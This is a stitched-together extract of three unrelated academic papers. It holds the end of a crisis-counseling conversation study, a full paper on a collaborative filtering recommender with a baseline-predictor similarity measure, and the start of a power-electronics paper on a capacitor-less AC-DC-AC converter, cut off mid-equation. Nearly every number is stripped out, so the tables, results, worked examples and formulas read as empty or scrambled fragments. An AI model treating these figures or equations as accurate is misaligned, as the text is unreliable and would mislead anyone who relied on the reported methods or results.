specifically, we create a balanced dataset of positive and negative conversations more than messages long and train a logistic regression model to predict the outcome given the first x% of messages in the conversation. there are such negative conver- sations and and we randomly subsample the larger set of positive conversations. we train the model with batch gradient descent and use l regulariza- tion when n-gram features are present and l reg- ularization otherwise. we evaluate our model with -fold cross-validation and compare models using the area under the roc curve (auc). features. we include three aspects of counselor messages discussed in section : hedges, check questions, and the similarity between the counselor’s message and previous texter message. we add a measure of how much progress the counselor has made (section ) by computing the viterbi path of stages for the conversation (only for the first x%) with the hmm conversation model and then adding the duration of each stage (in #messages) as a fea- ture. additionally, we add average message length . . . . . . . . . percent of conversation seen by the model . . . . . . . . . r o c a re a un de r th e cu rv e sc or e full model n-gram features only figure : prediction accuracies vs. percent of the con- versation seen by the model (without texter features). and average sentiment per message using vader sentiment (hutto and gilbert, ). further, we add temporal dynamics to the model by adding fea- ture conjunctions with the stages hmm model. af- ter running the stages model over the x% of the con- versation available to the classifier, we add each fea- ture’s average value over each stage as additional features. lastly, we explore the benefits of adding surface-level text features to the model by adding unigram and bigram features. because the focus of this work is on counseling strategies, we primar- ily experiment with models using only features from counselor messages. for completeness, we also re- port results for a model including texter features. prediction results. the model’s accuracy increases with x, and we show that the model is able to dis- features roc auc counselor unigrams only . counselor unigrams and bigrams only . none . + hedges . (+ . ) + check questions . (+ . ) + similarity to last message . (+ . ) + duration of each stage . (+ . ) + sentiment . (+ . ) + message length . (+ . ) + stages feature conjunction . (+ . ) + counselor unigrams and bigrams . (+ . ) + texter unigrams and bigrams . (+ . ) table : performance of nested models predicting con- versation outcome given the first % of the conversa- tion. in bold: full models with only counselor features and with additional texter features. tinguish positive and negative conversations after only seeing the first % of the conversation (see figure ). we attribute the significant increase in performance for x = (accuracy= . , auc= . ) to strong linguistic cues that appear as a conversation wraps up (e.g., “i’m glad you feel better.”). to avoid this issue, our detailed feature analysis is performed at x = . feature analysis. the model performance as fea- tures are incrementally added to the model is shown in table . all features improve model accuracy sig- nificantly (p < . ; paired bootstrap resampling test). adding n-gram features produces the largest boost in auc and significantly improves over a model just using n-gram features ( . vs. . auc). 
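to make the setup concrete, here is a simplified sketch of the classification pipeline: a small counselor-side feature vector, a regularized logistic regression, and cross-validated roc auc. the features are toy stand-ins for the hedges, check questions, stage durations, sentiment, and message-length features discussed above, and the number of cross-validation folds is an assumption since it is elided in the text.

```python
# a simplified, illustrative sketch of the outcome classifier: counselor-side
# features -> logistic regression -> cross-validated roc auc. the hedge
# lexicon and fold count are assumptions, not taken from the paper.

import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score

HEDGES = {"maybe", "perhaps", "somewhat", "might", "sort", "kind"}  # toy list

def featurize(counselor_messages):
    tokens = [m.lower().split() for m in counselor_messages]
    n_tokens = sum(len(t) for t in tokens) or 1
    hedge_rate = sum(tok in HEDGES for t in tokens for tok in t) / n_tokens
    question_rate = sum(m.strip().endswith("?") for m in counselor_messages) / len(counselor_messages)
    avg_len = n_tokens / len(counselor_messages)
    return [hedge_rate, question_rate, avg_len]

# conversations: (counselor messages in the first x% of the conversation,
# outcome label); synthetic examples shown only for illustration
conversations = [(["how are you feeling?", "maybe we can talk it through"], 1),
                 (["ok", "that is bad"], 0)] * 20
X = np.array([featurize(msgs) for msgs, _ in conversations])
y = np.array([label for _, label in conversations])

clf = LogisticRegression(penalty="l2", solver="liblinear", max_iter=1000)
auc = cross_val_score(clf, X, y, cv=5, scoring="roc_auc").mean()
print(f"cross-validated roc auc: {auc:.3f}")
```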
note that most features in the full model are based on word frequency counts that can be derived from n-grams which explains why a simple n-gram model already performs quite well. however, our model performs well with only a small set of lin- guistic features, demonstrating they provide a sub- stantial amount of the predictive power. the effec- tiveness of these features shows that, in addition to exhibiting group-level differences reported earlier in this paper, they provide useful signal for predicting the outcome of individual conversations. conclusion & future work knowledge about how to conduct a successful coun- seling conversation has been limited by the fact that studies have remained largely qualitative and small- scale. in this work, we presented a large-scale quan- titative study on the discourse of counseling con- versations. we developed a set of novel computa- tional discourse analysis methods suited for large- scale datasets and used them to discover actionable conversation strategies that are associated with bet- ter conversation outcomes. we hope that this work will inspire future generations of tools available to people in crisis as well as their counselors. for ex- ample, our insights could help improve counselor training and give rise to real-time counseling qual- ity monitoring and answer suggestion support tools. acknowledgements. we thank bob filbin for fa- cilitating the research, cristian danescu-niculescu- mizil for many helpful discussions, and dan ju- rafsky, chris manning, justin cheng, peter clark, david hallac, caroline suen, yilun wang and the anonymous reviewers for their valuable feedback on the manuscript. this research has been sup- ported in part by nsf cns- , iis- , nih bd k, aro muri, darpa xdata, darpa simplex, stanford data science initiative, boe- ing, lightspeed, sap, and volkswagen. references tim althoff and jure leskovec. . donor retention in online crowdfunding communities: a case study of donorschoose.org. in www. tim althoff, cristian danescu-niculescu-mizil, and dan jurafsky. . how to ask for a favor: a case study on the success of altruistic requests. in icwsm. vikas ganjigunte ashok, song feng, and yejin choi. . success with style: using writing style to pre- dict the success of novels. in emnlp. regina barzilay and lillian lee. . catching the drift: probabilistic content models, with applications to generation and summarization. in hlt-naacl. aaron t. beck. . depression: clinical, experimen- tal, and theoretical aspects. university of pennsylva- nia press. philip bramsen, martha escobar-molano, ami patel, and rafael alonso. . extracting social power rela- tionships from natural language. in hlt-naacl. marc brysbaert, amy beth warriner, and victor kuper- man. . concreteness ratings for thousand generally known english word lemmas. behavior re- search methods, ( ). r. sherlock campbell and james w. pennebaker. . the secret life of pronouns: flexibility in writing style and physical health. psychological science, ( ). ge chen. . visualizations for mental health topic models. master’s thesis, mit. cristian danescu-niculescu-mizil, lillian lee, bo pang, and jon kleinberg. . echoes of power: language effects and power differences in social interaction. in www. cristian danescu-niculescu-mizil. . a computa- tional approach to linguistic style coordination. ph.d. thesis, cornell university. karthik dinakar, allison j.b. chaney, henry lieberman, and david m. blei. a. real-time topic models for crisis counseling. in kdd dssg workshop. 
karthik dinakar, emily weinstein, henry lieberman, and robert selman. b. stacked generalization learning to analyze teenage distress. in icwsm. karthik dinakar, jackie chen, henry lieberman, ros- alind picard, and robert filbin. . mixed- initiative real-time topic modeling & visualization for crisis counseling. in acm iciui. marco guerini, alberto pepe, and bruno lepri. . do linguistic style and readability of scientific ab- stracts affect their virality? in icwsm. shane haberstroh, thelma duffey, marcheta evans, robert gee, and heather trepal. . the experi- ence of online counseling. journal of mental health counseling, ( ). christine howes, matthew purver, and rose mccabe. . linguistic indicators of severity and progress in online text-based therapy for depression. clpsych workshop at acl . rongyao huang. . language use in teenage crisis intervention and the immediate outcome: a machine automated analysis of large scale text data. master’s thesis, columbia university. c.j. hutto and eric gilbert. . vader: a parsimo- nious rule-based model for sentiment analysis of social media text. in icwsm. thomas r. insel. . assessing the economic costs of serious mental illness. the american journal of psychiatry, ( ). john kalafat, madelyn gould, jimmie lou harris mun- fakh, and marjorie kleinman. . an evaluation of crisis hotline outcomes part : nonsuicidal crisis callers. suicide and life-threatening behavior, ( ). william labov and david fanshel. . therapeutic discourse: psychotherapy as conversation. dana heller levitt and jodi d. jacques. . promot- ing tolerance for ambiguity in counselor training pro- grams. the journal of humanistic counseling, edu- cation and development, ( ). tomas mikolov, ilya sutskever, kai chen, greg cor- rado, and jeff dean. . distributed representa- tions of words and phrases and their compositionality. in nips. national institute of mental health. . any mental illness (ami) among u.s. adults. http://www.nimh.nih.gov/health/ statistics/prevalence/any-mental- illness-ami-among-us-adults.shtml. retrieved june , . kate g. niederhoffer and james w. pennebaker. . linguistic style matching in social interaction. jour- nal of language and social psychology, ( ). michael j. paul. . mixed membership markov models for unsupervised conversation modeling. in emnlp-conll. james w. pennebaker, matthias r. mehl, and kate g. niederhoffer. . psychological aspects of natural language use: our words, our selves. annual review of psychology, ( ). john p. pestian, pawel matykiewicz, michelle linn-gust, brett south, ozlem uzuner, jan wiebe, kevin b. co- hen, john hurdle, and christopher brew. . senti- ment analysis of suicide notes: a shared task. biomed- ical informatics insights, (suppl. ). tom pyszczynski and jeff greenberg. . self- regulatory perseveration and the depressive self- focusing style: a self-awareness theory of reactive de- pression. psychological bulletin, ( ). tom pyszczynski, kathleen holt, and jeff greenberg. . depression, self-focused attention, and ex- pectancies for positive and negative future life events for self and others. journal of personality and social psychology, ( ). nairan ramirez-esparza, cindy chung, ewa kacewicz, and james w. pennebaker. . the psychology of word use in depression forums in english and in span- ish: testing two text analytic approaches. in icwsm. shiquan ren, hong lai, wenjing tong, mostafa amin- zadeh, xuezhang hou, and shenghan lai. . non- parametric bootstrapping for hierarchical data. jour- nal of applied statistics, ( ). 
alan ritter, colin cherry, and bill dolan. . unsu- pervised modeling of twitter conversations. in hlt- naacl. harvey sacks and gail jefferson. . lectures on con- versation. wiley-blackwell. andreas stolcke, klaus ries, noah coccaro, eliza- beth shriberg, rebecca bates, daniel jurafsky, paul taylor, rachel martin, carol van ess-dykema, and marie meteer. . dialogue act modeling for automatic tagging and recognition of conversational speech. computational linguistics, ( ). yla r. tausczik and james w. pennebaker. . the psychological meaning of words: liwc and comput- erized text analysis methods. journal of language and social psychology, ( ). http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml teun van dijk. . discourse studies: a multidisci- plinary approach. sage. world health organization. . depression: fact sheet no . http://www.who.int/ mediacentre/factsheets/fs /en/. re- trieved november , . jaewon yang, julian mcauley, jure leskovec, paea lependu, and nigam shah. . finding pro- gression stages in time-evolving event sequences. in www. http://www.who.int/mediacentre/factsheets/fs /en/ http://www.who.int/mediacentre/factsheets/fs /en/ paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) a collaborative filtering recommendation algorithm with improved similarity calculation yang ju a , liu bailin b and zhao zhixiang school of computer science and engineering, xi'an technological university xi'an, , shaanxi state and provincial joint engineering lab. of advanced network and monitoring control xi'an, , china e-mail: a yangju @ .com, b @qq.com abstract—in order to improve the accuracy of the proposed algorithm in collaborative filtering recommendation system, an improved pearson collaborative filtering (ip-cf) algorithm is proposed in this paper. the algorithm uses the user portrait, item characteristics and data of user behavior to compute the baseline predictors model. instead of the traditional algorithm's similarity calculation, the prediction model is used to improve the accuracy of the recommendation algorithm. experimental results on moivelens dataset show that the ip-cf algorithm significantly improves the accuracy of the recommended results, and the rmse and mae evaluation results are better than the traditional algorithms. keyword-recommendation algorithm; collaborative filtering; similarity calculation; baseline predictors model i. introduction with the rapid development of computer technology and network technology, the number of network information services and applications is growing rapidly. china internet network information center reported statistics, as of june , the size of china's internet users reached million, a total of . million new netizens in half a year [ ] . with the increase in the number of people on the internet, internet information has also seen explosive growth. how to find interesting and effective information in this vast data is a very difficult thing. in order to solve this problem, academia and industry put forward personalized recommendation system [ ] . according to the user's personal information and historical habits, it can discover the potential interest of the user and recommend the resources of interest to the user actively. 
personalized recommendation system is a special form of information filtering system [ ] . the recommendation system can be divided into the following categories: collaborative filtering recommendation system, content-based recommendation system and hybrid recommendation system. because of its wide applicability, strong interpretability and good stability, the collaborative filtering recommendation system based on neighborhood model is widely used in various fields. therefore, this paper focuses on the collaborative filtering recommendation system based on neighborhood model. the accuracy of recommendation results in the recommendation system is the main index to measure the recommendation effect. sarwar et al. [ ] proposed an item- based collaborative filtering recommendation algorithm that looked into cosine-based similarity to compute the similarity between products. this method provides dramatically better performance than traditional recommendation algorithm, while at the same time providing better accuracy. chen and cheng [ ] use the rating data to compute the similarity between users, and use the ranking data as the weight of similarity calculation. yang and gu [ ] propose to use user behavior information to construct the user's interest points and use the interest points to compute the similarity between users. experiments show that these methods are better than the classic collaborative filtering algorithm. however, these methods only consider the user-item behavioral data, and neglect the user portrait and item features, which causes deviations in the accuracy of the recommendation result. this paper improves similarity calculation method in collaborative filtering recommendation algorithm based on neighborhood model, and uses the user portrait, item characteristics and user-item behavior data to compute similarity. we experimentally evaluate our results and compare them to the classic collaborative filtering algorithm. experiments suggest that the improved similarity calculation method can improve the accuracy of the recommended results. ii. collaborative filtering recommendation algorithm based on neighborhood model collaborative filtering recommendation algorithm is to select the same custom hobby user groups, use other people's experience to meet their own needs, in order to achieve the purpose of reducing overhead. typically, the workflow of a collaborative filtering system is: ( ) compute the similarity between users. ( ) determine the neighbor set. find the k users whose user interest is the most similar through the similarity size, and set these users as the user sets. ( ) according to the user sets prediction rating. the system recommends items that the users have rated highly but not yet being rated by this user. the most important thing in collaborative filtering algorithm is similarity calculation. for the calculation of international conference on sensor network and computer engineering (icsnce ) similarity, the researchers put forward a variety of similarity calculation methods. cosine-based similarity: for user u and user v , ( )n u denotes the set of positive feedback items for user u , and ( )n v denotes the set of positive feedback items for user v . and similarity between items u and v , denoted by ( , )sim u v is given by: )()( )()( ),( vnun vnun vusim    pearson correlation coefficient [ - ] : in this case, similarity is computing based on the vector of the rating. 
here, \bar{r}_u in the formula below can take two forms in traditional recommenders: one is the average rating of user u, and the other is the average rating of item i over all users. the pearson correlation is given by:

sim(u,v) = \frac{\sum_{i \in I_{uv}} (r_{ui} - \bar{r}_u)(r_{vi} - \bar{r}_v)}{\sqrt{\sum_{i \in I_{uv}} (r_{ui} - \bar{r}_u)^2}\,\sqrt{\sum_{i \in I_{uv}} (r_{vi} - \bar{r}_v)^2}}   ( )

the similarity between users can be calculated by the above formula, and by ranking each user's similarity to all other users we obtain the nearest-neighbor user set. after getting the user set, the next step is interest prediction. we denote the prediction p(u,i) as:

p(u,i) = \sum_{v \in S^k(u) \cap N(i)} sim(u,v)\, r_{vi}   ( )

iii. improved similarity measures

this paper considers the user rating data from the overall situation and introduces the characteristics of personal habits, item quality and category to improve the similarity computation. the approximated correlation coefficient is given by:

s_{m,n} = \frac{\sum_{i \in P_{m,n}} (r_{mi} - b_{mi})(r_{ni} - b_{ni})}{\sqrt{\sum_{i \in P_{m,n}} (r_{mi} - b_{mi})^2}\,\sqrt{\sum_{i \in P_{m,n}} (r_{ni} - b_{ni})^2}}   ( )

here, s_{m,n} denotes the similarity between users m and n, r_{mi} is the raw rating of user m for item i, and P_{m,n} is the set of items rated in common by users m and n. b_{mi} is the baseline predictor for rating r_{mi}. the baseline predictors model is as follows:

b_{mi} = \mu + b_m + b_i + \sum_{g \in G_i} c_g   ( )

\mu denotes the intercept of the baseline predictors model. the parameters b_m and b_i indicate the deviations of user m and item i, respectively, from the average. the last term denotes the preference of the user for the item's categories, where G_i is the set of categories to which the item belongs. here we use an example to illustrate the baseline predictors model. consider the rating of movie i by user m. assume the mean rating of all movies is . . m is a critical user, who tends to rate . stars lower than the average. i is a movie with a relatively high standard, so its rating is . stars higher than the average rating. in addition, movie i belongs to categories c_x, c_y, c_z, with biases relative to the average of - . , . , . . therefore, the prediction for the rating of movie i by user m is . - . + . - . + . + . = . .

for this model, the goal is to find b_m, b_i and c_g. this paper obtains them by solving a least-squares problem [ - ]. the cost function is as follows:

\min_{b_*} \sum_{(m,i) \in K} \left( r_{mi} - \mu - b_m - b_i - \sum_{g \in G_i} c_g \right)^2   ( )

\min_{b_*} \sum_{(m,i) \in K} e_{mi}^2 + \lambda \left( \sum_{m} b_m^2 + \sum_{i} b_i^2 + \sum_{g} c_g^2 \right),\qquad e_{mi} = r_{mi} - \left( \mu + b_m + b_i + \sum_{g \in G_i} c_g \right)   ( )

in formula ( ), r_{mi} is the true rating of the user for the item; in formula ( ), K represents the set of observed user-item ratings, and the penalty sums run over the user set, the item set, and the category set. the solution is obtained by finding the best-fitting b_m, b_i and c_g that minimize the first term \sum_{(m,i) \in K} e_{mi}^2 in equation ( ). the second term is the l regularizer, added to prevent overfitting; the size of \lambda controls the degree of regularization, and in general the larger \lambda is, the smoother the fitted model is. because the proposed model differs from the traditional one, the raw data matrix cannot be applied directly to train it. the training data matrix is therefore restructured to add personal habits, item quality and category bias. for example, when a movie i is released, it may be described in terms of elements such as comics, entertainment and suspense; these classified data are useful for the model but cannot be used in their raw form.
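a compact sketch of the two components defined above, fitting the baseline predictors by regularized least squares and computing the residual-based similarity s_{m,n}, is given below. the solver choice (scipy's least_squares with the l2 penalty folded into the residuals) and the toy data are illustrative assumptions, not necessarily the authors' exact procedure.

```python
# a hedged sketch of the baseline predictors model b_mi = mu + b_m + b_i +
# sum_g c_g and the residual-based pearson similarity defined above. the
# optimizer and the toy data are illustrative choices only.

import numpy as np
from scipy.optimize import least_squares

# ratings: (user, item, rating); item_cats: item -> list of category indices
ratings = [(0, 0, 5.0), (0, 1, 3.0), (1, 0, 4.0), (1, 2, 2.0), (2, 1, 4.0)]
item_cats = {0: [0], 1: [0, 1], 2: [1]}
n_users, n_items, n_cats, lam = 3, 3, 2, 0.1

def unpack(theta):
    mu = theta[0]
    b_u = theta[1:1 + n_users]
    b_i = theta[1 + n_users:1 + n_users + n_items]
    c_g = theta[1 + n_users + n_items:]
    return mu, b_u, b_i, c_g

def residuals(theta):
    mu, b_u, b_i, c_g = unpack(theta)
    err = [r - (mu + b_u[u] + b_i[i] + c_g[item_cats[i]].sum())
           for u, i, r in ratings]
    # l2 regularization expressed as extra residual terms
    reg = np.sqrt(lam) * np.concatenate([b_u, b_i, c_g])
    return np.concatenate([np.array(err), reg])

theta0 = np.zeros(1 + n_users + n_items + n_cats)
fit = least_squares(residuals, theta0)
mu, b_u, b_i, c_g = unpack(fit.x)

def baseline(u, i):
    return mu + b_u[u] + b_i[i] + c_g[item_cats[i]].sum()

def improved_similarity(m, n, user_ratings):
    """residual-based pearson over the items both users rated."""
    common = set(user_ratings[m]) & set(user_ratings[n])
    if not common:
        return 0.0
    dm = np.array([user_ratings[m][i] - baseline(m, i) for i in common])
    dn = np.array([user_ratings[n][i] - baseline(n, i) for i in common])
    denom = np.linalg.norm(dm) * np.linalg.norm(dn)
    return float(dm @ dn / denom) if denom else 0.0

user_ratings = {}
for u, i, r in ratings:
    user_ratings.setdefault(u, {})[i] = r
print(improved_similarity(0, 1, user_ratings))
```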
through the transformation of the data format, useful information is used, and the information is vectorized according to the classification categories. each row of data through the transformation training matrix can be expressed as: {( , ), ... , ... , ... , | } m n j ui u i u u i i c c r c g . international conference on sensor network and computer engineering (icsnce ) table i. training data matrix ),( iu u ... mu i ... ni c ... jc uir ( , ) ... ... ... ... ... ... ... ... ... ... ... ... ... ... ( ,n) ... ... ... ... ... ... ... ... ... ... ... ... ... ... (m,n) ... ... ... table ii. moivelens dataset information version users movies size sparsity ml k . % the training data matrix is shown in table . the complete algorithm steps are described as follows: a) compute the baseline predictors model. according to the formula ( ) combined with the rating matrix, personal habits, item quality and category, the least square method is used to solve for mi b , m b , i b , and i g g g c   . the solution formulas are ( ) and ( ). b) compute similarity. using formula ( ), compute the similarity between each two users. c) getting a set of nearest neighbors. according to the similarity computed in the steps (b), we sort the nearest neighbors of user m that need to be predicted, and determine the relevant user set k m s according to sorting order and k. d) rating prediction. according to formula ( ), system recommends items that the users have rated highly but not yet being rated by this user. iv. experimental evaluation a. data set and evaluation metrics in order to verify the actual recommendation effect of the proposed algorithm (improved pearson similarity collaborative filtering, ip-cf) in this paper, the moivelens film data set was used for verification. this data set consists of: ① , ratings ( - ) from users on movies. ②user data and item data have simple feature portraits. ③ users with less complete personal portraits and fewer comments in the data have been cleaned. the dataset information is shown in table . select the root mean square error (rmse) and mean absolute error (mae) to evaluate the accuracy of the recommendation algorithm on the rating data [ - ] . the smaller the value, the higher the accuracy of the prediction. for a user u and item i in the test set, uir is the actual rating, uir̂ is the predicted rating, and t is the total number figure . comparison of precision between ipcf algorithm and traditional algorithm of items that need to be predicted. the rmse and mae formulas are as follows:     tiu uiui rr t rmse , ˆ     tiu uiui rr t mae , ˆ  b. experimental results ) comparison of accuracy of recommendation algorithms the traditional cosine similar algorithm (cosine-cf) and pearson similar algorithm (pearson-cf) were compared with the proposed algorithm (ip-cf). we tested them on our data sets by computing rmse and mae. the size k of similar user set is from to . figure shows the experimental results. it can be observed from the results that the rmse and mae values of the improved similarity algorithm proposed in this paper decrease with the increase of the neighborhood. when the number of near-neighbor sets reaches a certain amount, it tends to a fixed value. the traditional collaborative filtering algorithm (pearson similarity and cosine similarity) needs to find the optimal result, if the number is too large, it will affect the accuracy of the recommendation result. 
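for reference, the two accuracy metrics used in these comparisons can be computed with a few lines; the helper below is a sketch that follows the formulas given above and is independent of any particular recommender.

```python
# rmse and mae over a test set of (actual, predicted) rating pairs,
# matching the formulas given above.

from math import sqrt

def rmse(pairs):
    return sqrt(sum((r - p) ** 2 for r, p in pairs) / len(pairs))

def mae(pairs):
    return sum(abs(r - p) for r, p in pairs) / len(pairs)

# toy example
test_pairs = [(4.0, 3.5), (2.0, 2.5), (5.0, 4.0)]
print(rmse(test_pairs), mae(test_pairs))
```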
overall, the rmse and mae of the rating prediction are . % and . % lower than the figure . comparison between the baseline predictors model and the traditional model international conference on sensor network and computer engineering (icsnce ) traditional algorithm respectively. the ip-cf algorithm has better accuracy. ) comparison of accuracy of baseline predictors the following experiments verify the effectiveness of the baseline predictors model. the experiment compares the user mean model (bu), basic baseline predictors model (bp), and improved baseline predictors model (ubp). experimental results show that the improved baseline predictors model significantly improves the accuracy of the baseline prediction. v. conclusion in this paper, a collaborative filtering recommendation algorithm based on improved similarity computation is proposed, which takes into account user portrait, item characteristics and user behavior data in recommendation process. experiments have shown that user portraits and item features played an important role in improving the accuracy of recommendations, and which are an important basis for analyzing potential needs. secondly, we found that in the top-n recommendation, the number of neighbors and the evaluation index are not a positive or negative relationship, and the size of the neighbor will affect the accuracy of the recommendation. our further work will research the relationship between the number of neighbors and the effectiveness of recommendations, especially how to choose the best neighbor value to improve the accuracy of recommendations. references [ ] statistical report on internet development in china[r]. china internet network information center, . [ ] borkar v, carey mj, li c. inside big data management:ogres, onions, or parfaits[c]. proceedings of the th international conference on extending database technology. acm, : - . [ ] wang guoxia, liu heping. survey of personalized recommendation system[j]. computer engineering and applications, , ( ), - . [ ] sarwar b, karypis g, konstan j, et al. item based collaborative filtering recommendation algorithms[c]. proc th int’l www conf, hong kong, : - . [ ] chen yl , cheng lc. a novel collaborative filtering approach for recommending ranked items[c]. expert systems with applications, , ( ): - . [ ] yang mh, gu zm. personalized recommendation based on partial similarity of interests[c]. advanced data mining and applications proceedings, , : - . [ ] fu he-gang, wang zhu-wei. improvement of item-based collaborative filtering algorithm[j]. journal of chongqing university of technology(natural science), ( ): - . [ ] guo lei, ma jun. incorporating item relations for social recommendation[j]. chinese journal of computers, , ( ): - . [ ] x. luo, xia, y. and zhu, q. incremental collaborative filtering recommender based on regularized matrix factorization[j]. knowledge-based systems, , , pp. - . [ ] sun chen, xi hongsheng, gao rong. a recommendation-support model using neighborhood-based linear least squares fitting[j]. journal of xi'an jiaotong university, , ( ), - . [ ] c. rana, and jain, s.k. a study of the dynamic features of recommender systems[j]. artificial intelligence review, , ( ), pp. - . [ ] item-network-based collaborative filtering: a personalized recommendation method based on a user’s item network[j]. taehyun ha, sangwon lee. information processing and management. ( ). [ ] gai li, zhiqiang zhang, et al. one-class collaborative filtering based on rating prediction and ranking prediction[j]. 
knowledge- based systems. . paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , one novel control strategy for ac-dc-ac converter without dc link electrolytic capacitor shihong xie school of electrical and information engineering shaanxi university of science & technology xi’an, china e-mail: xierthy@ .com yanjing meng school of electrical and information engineering shaanxi university of science & technology xi’an, china e-mail: yjm @ .com abstract—a novel control strategy for ac-dc-ac converter without electrolytic capacitor is proposed to settle the disadvantage of the traditional converter caused by large electrolytic capacitors. this study is developed in four parts: first, after analyzing for the large electrolytic capacitor defect, one novel electrolytic capacitor-less converter and its control strategy are proposed; second, the efficiency of voltage conversion for the novel converter is deduced and compared with the conventional converter, third, the mathematics model of the converter is built; forth, some simulation tests are carried out to verify the performance of converter. the simulation results show that the proposed converter is valid. keywords-converter; electrolytic capacitor; six-pulse voltage; mathematic model; energy feedback i. introduction the traditional voltage ac-dc-ac converters have been widely used in many domains. in view of filtering and energy saving, many large electrolytic capacitors are often connected to the dc link of the traditional converter. but these electrolytic capacitors have many disadvantages such as big volume, high cost and short life [ - ] . these disadvantages will result in the converter losing efficacy. so, one novel converter without electrolytic capacitor is considered as a solution for the disadvantages of the traditional converter. numerous articles explore the solution in recent years. one topology of electrolytic capacitor-less converter was presented in [ - ]. one feed-forward compensation control scheme is applicable to resist the influence of improper input voltages in [ ]. the resistance-inductance load but three- phase induction motor load tested in the article couldn’t completely verify the performances of the supposed converter. one proportional-resonant control of a single- phase to three-phase converter without electrolytic capacitor is proposed in[ ].but power of the converter with a single- phase input power source is limited in [ - ]. in [ ], one energy feedback system built on amplitude and phase control sinusoidal pulse wide modulation(spwm) technology was putted forward. the system could improve the control performance of energy feedback current, but employed the double quantity of electrolytic capacitors of the traditional converter. in [ ], a direct ac-ac converter connected by high frequency transformer is proposed. this converter could serve as one phase or three phases energy conversion equipment. nonetheless, the volume of the high frequency transformer restricted the largest power of this converter. on the other hand, electrolytic capacitor also exists in this converter. contrasting to above schemes, one ac-dc-ac converter without dc link electrolytic capacitor proposed in [ - ] gets a better scheme to settle these disadvantages of the traditional converter. this converter includes two back- to-back voltage source inverters and there is only a five microfarad ceramic capacitor in its dc link. 
nonetheless, the dynamic deviation of the dc link voltage reaches twenty volts that isn’t a favorable performance. in [ - ], other circuit topologies of converter without electrolytic capacitor are also proposed, but main content is to study power-decoupling of a multi-port isolated converter in [ ], and the theme is to solve the high-frequency pulsating of three-phase converter in [ ]. inspired by above articles, the paper presents an electrolytic capacitor-less converter that its dc link voltage is six pulse voltage. the first content is to analyze the fundamental function of the dc link electrolytic capacitor and put the novel converter topological structure. the second content is to deduce the voltage conversion efficiency of the proposed converter. and the third is to build the model of the converter-motor system and test the performance of the system. ii. the converter without electrolytic capacitor a. the analysis for dc link electrolytic capacitor of the traditional converter dc link electrolytic capacitors of the conventional voltage source ac-dc-ac converter have two fundamental functions. the first is voltage smoothing. the output voltage of the front-end rectifier of the converter is a pulsation dc voltage. the voltage rectified by six diodes consists of six sinusoid-heads in one power source period and contains the heavy harmonic. however, one constant dc voltage is expected to the inverter of the conventional converter. many electrolytic capacitors can be paralleled on the dc link of the converter to smooth the pulsation dc voltage. the second function of electrolytic capacitor for the traditional converter is energy stockpiling. when instantaneous value of the input ac line voltage of the traditional converter feeding a doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , induction motor is larger than the value of dc link voltage, the front-end rectifier is in on work, the input power source feeds the electrolytic capacitors and load. on the contrary, the front-end rectifier is disabled and the electrolytic capacitors feeds the motor. on another condition, when the motor is reducing speeds, the stator voltages are higher than the dc link voltage and energy feeds back to the electrolytic capacitors. so, above two functions should be disposed in another new converter system in that the electrolytic capacitors are removed from the dc link of converter. b. the converter topology one novel electrolytic capacitor-less converter topology is showed in figure . power-side rectifier is composed of six diodes. and the load-side inverter is composed of six insulated gate bipolar transistors(igbt) and every igbt is severally paralleled with a backward diode. the differences of the novel converter comparing with the traditional is that capacitor c paralleled on the dc link is a small non-polarity thin-film capacitor and every igbt of the power-side inverter is paralleled with a resistance-capacitor protection circuit. the small capacitor is expected to absorb the peak voltage generated by switching action. basing the purpose of the novel converter, energy from the motor can be fed back to the power grid and a dc link six-pulse voltage composing of six sinusoid-heads in one period can be maintained. the power-side inverter feeding energy back to the power grid can be controlled with a simple method. 
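before the triggering rule is described in detail, a short numerical sketch of the six-pulse dc link voltage this topology is meant to maintain: with an ideal diode rectifier the dc link simply follows the largest line-to-line voltage, i.e. the difference between the maximum and minimum phase voltages, which yields six sinusoid heads per input period. the amplitude and frequency below are illustrative values only, not parameters taken from this paper.

```python
# illustrative computation of the six-pulse dc link voltage of a diode
# rectifier: u_d(t) = max(ua, ub, uc) - min(ua, ub, uc). amplitude and
# frequency are example values, not parameters from the paper.

import numpy as np

f = 50.0                      # supply frequency in hz (illustrative)
u_m = 311.0                   # phase-voltage amplitude in volts (illustrative)
t = np.linspace(0.0, 1.0 / f, 1000)

ua = u_m * np.sin(2 * np.pi * f * t)
ub = u_m * np.sin(2 * np.pi * f * t - 2 * np.pi / 3)
uc = u_m * np.sin(2 * np.pi * f * t + 2 * np.pi / 3)

u_d = np.maximum.reduce([ua, ub, uc]) - np.minimum.reduce([ua, ub, uc])
print(u_d.min(), u_d.max())   # ripples between 1.5*u_m and sqrt(3)*u_m
```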
the power-side inverter will be triggered only when the dc link voltage pumped by the feedback energy is greater than the expected six-pulse value. the control principle is that the igbt corresponding with the conductive diodes of the power-side rectifier will be triggered. for example, when the diodes of a-phase up bridge arm and b-phase down bridge arm of the power-side rectifier are conductive, the dc link voltage is equal to input line voltage uab. if motor energy starts to feed back to capacitor c, dc link voltage will be higher than the input line voltage uab, the above conductive two diodes will be turn-off naturally and the igbt of a- phase up bride arm and b-phase down bridge arm of the power-side inverter will be triggered. ua ub uc ua ub uc c + - ud figure . topology of converter without electrolytic capacitor c. voltage conversation efficiency of the novel inverter in order to analyze the output voltage of the novel converter, voltage conversation efficiency is defined as the following. o i u u  ( ) in this equation, o u is the effective value of fundamental wave of the output voltage and i u is the phase voltage effective value of the three phases input voltages of the converter. the space vector pulse width modulation(svpwm) technology can be used to enhance the voltage conversation efficiency and reduce the output voltage harmonic. basing this technology, the triggering time of every igbt device will be computed precisely in accordance with the instantaneous dc link voltage. hence, the disturbance caused by the change of dc link voltage has been restrained. on the other hand, the harmonic generated by the sampling period is further reduced because the switch frequency of igbt is higher than the frequency of input voltage. many presented papers verify the performance of the svpwm method[ - ]. space voltage vector is defined as the following. a b c ( ) jr j r sv u u e u e   ( ) in this equation, r is equal to two thirds  . if ua, ub, and uc are three-phase balanced voltages, the following equation can be acquired. jr s m m j m j m j u cos( ) u cos( - ) u cos( ) u e v e r t t s v t t e t e                  ( ) in this equation, um is the amplitude of 